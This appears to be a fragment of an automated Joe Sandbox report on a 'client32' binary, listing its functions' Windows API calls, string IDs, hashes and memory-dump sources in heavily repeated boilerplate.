                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6bea5c09297829cbfb848c60cb5d7fef759d0651ead25e322a2e7de13e6ca9cc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0518D74B00706ABD760DF64CC81FAAF3B9BF44708F108568EA56AB685DB30F944CB94
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegisterClassA.USER32(111E9674), ref: 1105D1F2
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,NSMCobrProxy,11190240,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1105D233
                                                                                                                                                                                                    • SetPropA.USER32(?,NSMCobrProxy,00000000), ref: 1105D2BD
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,?,00000000,00000000), ref: 1105D2E0
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 1105D2F6
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 1105D2FC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ClassCreateDispatchErrorExitLastProcessPropRegisterTranslateWindowwsprintf
                                                                                                                                                                                                    • String ID: CobrowseProxy.cpp$CobrowseProxy::RunCobrowse$NSMCobrProxy$_bOK$m_hAppWin
                                                                                                                                                                                                    • API String ID: 13347155-1383313024
                                                                                                                                                                                                    • Opcode ID: 6615396438022e20a6e8c72f97bc0a79f3717cf56149bec578354cdf49c6fa9e
                                                                                                                                                                                                    • Instruction ID: 0f733430d951bad01d0579ae861b00247f75b5e4436af6dec06e8f89504007ad
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6615396438022e20a6e8c72f97bc0a79f3717cf56149bec578354cdf49c6fa9e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3341F1B5E0074AABD761DFA5CC84F9FFBA5AB44758F10842AF91697280EA30E440CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 1106B52F
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1106B757
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$BlankClientScreen$BlankWhenLocked$Client$ImageWhenLocked$ScreenScrape$Skip$View$WallPaper$idata->tr
                                                                                                                                                                                                    • API String ID: 3168844106-1048486867
                                                                                                                                                                                                    • Opcode ID: 228252bf60993e848db0fae9416fd11413a540e84ca787b35673dbc210882ab8
                                                                                                                                                                                                    • Instruction ID: 2793f6ef4bea0a2ff565c34b0f8eca561f5e568fe894aa0c90d3ebafbe6a86ab
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 228252bf60993e848db0fae9416fd11413a540e84ca787b35673dbc210882ab8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD817DB0F40B4AABEB15CF65CC84BDDBBE8BF48314F144259FA25A62D0DB786940CB45
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Valid
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1304828667-0
                                                                                                                                                                                                    • Opcode ID: 968f1060436d41cc023d15c317d07752337f542597abbb27ccde972048b352e3
                                                                                                                                                                                                    • Instruction ID: 0b0265ab003c9f5023d50e7461e09058b057b1ac000d34903896340fa356dc58
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 968f1060436d41cc023d15c317d07752337f542597abbb27ccde972048b352e3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB419271E0462ADFDB11CFA8D885BAEBBF9EB44705F1081A5FD15E7244DB309901C7A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 110A75D6
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 110A75E2
                                                                                                                                                                                                    • GetRgnBox.GDI32(?,11048949), ref: 110A7603
                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,00000005), ref: 110A7622
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110A7638
                                                                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,00000005,00FF0062), ref: 110A7667
                                                                                                                                                                                                    • OffsetRgn.GDI32(00000000,?,00000005), ref: 110A7682
                                                                                                                                                                                                    • SelectClipRgn.GDI32(00000000,00000000), ref: 110A7693
                                                                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,00000005,00CC0020), ref: 110A76B3
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 110A76BE
                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 110A76C5
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 110A76D1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Select$CompatibleCreateObject$BitmapClipDeleteOffsetRelease
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1998184411-0
                                                                                                                                                                                                    • Opcode ID: ca1efe98171b5a85fa15818eb71c06998636f57872ca048fd57581ab3a04e152
                                                                                                                                                                                                    • Instruction ID: d01220f1ca20b58af6d54b71fb89cfd4fca4eb7da2e1d7c7476d03a363cea98d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca1efe98171b5a85fa15818eb71c06998636f57872ca048fd57581ab3a04e152
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C841EA75A00616AFD715CFA8C889EBFBBB9FB8C705F108559FA15A3244CB35AC01CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetStretchBltMode.GDI32(?,?,?,1101C9E1,?,00000002,?), ref: 110CD768
                                                                                                                                                                                                    • SetStretchBltMode.GDI32(?,00000004), ref: 110CD776
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 110CD77E
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 110CD787
                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000280,000001E0), ref: 110CD79A
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110CD7A5
                                                                                                                                                                                                    • StretchBlt.GDI32(?,?,?,00000000,?,00000000,00000000,00000000,00000280,000001E0,00CC0020), ref: 110CD80C
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,1101C9E1), ref: 110CD817
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 110CD821
                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 110CD828
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 110CD831
                                                                                                                                                                                                    • SetStretchBltMode.GDI32(?,?), ref: 110CD83E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Stretch$ModeObject$CompatibleCreateDeleteSelect$BitmapRelease
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3869104054-0
                                                                                                                                                                                                    • Opcode ID: 4cd5c15a1307939a7bc44611b11280addb4b9eea335058283b3b6782dfa3e116
                                                                                                                                                                                                    • Instruction ID: 9115cb6fd31e605d31799654545640bcc5eda688478f30b87190566900b2352f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cd5c15a1307939a7bc44611b11280addb4b9eea335058283b3b6782dfa3e116
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD310BB5600215AFD700DFA8CC89FAEB7B9EF8D705F208159FA15DB294D670AD01CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(user32,?,?,?,?,00000000), ref: 110FD3AD
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetGUIThreadInfo), ref: 110FD3C5
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,SendInput), ref: 110FD43A
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,00000000), ref: 110FD526
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressLibraryProc$FreeLoad
                                                                                                                                                                                                    • String ID: 0$GetGUIThreadInfo$SendInput$user32
                                                                                                                                                                                                    • API String ID: 2256533930-271338563
                                                                                                                                                                                                    • Opcode ID: be1e91ac694330f965b28f15093c1c5f42510e737a99044b1ed0c3d2e03dee73
                                                                                                                                                                                                    • Instruction ID: 43fa602a4ac72add29387a7c175e2a735ec2c38defe54f2081db145d70293a55
                                                                                                                                                                                                    • Opcode Fuzzy Hash: be1e91ac694330f965b28f15093c1c5f42510e737a99044b1ed0c3d2e03dee73
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBA1A270E043A69FDB16CF64CC85BADBBF9FB44708F0081A9E52897284DB759A84CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(Client,00000000,00000001,00000000), ref: 110FD146
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110FD17C
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110FD18A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentThread$ErrorLast
                                                                                                                                                                                                    • String ID: *Log_%d$Client$Event. %s$LogWhileConnected$PLATFORM.CPP$nstrings <= 4
                                                                                                                                                                                                    • API String ID: 4172138867-3565238984
                                                                                                                                                                                                    • Opcode ID: eb309260b65eb184e950d2832ff89cbda71d3e6208cd11c1851e8b991c9664c9
                                                                                                                                                                                                    • Instruction ID: fb898e99375fe03a3fe41083e55742ce7b0b576ff4a7e429a818e7135f918612
                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb309260b65eb184e950d2832ff89cbda71d3e6208cd11c1851e8b991c9664c9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72514935E00117ABDB11CFA5CC86FBEBBA9FF85718F104579F92597280E734A80187A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 11075147
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 1107514D
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 11075157
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32 ref: 110751AC
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(?), ref: 110751B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
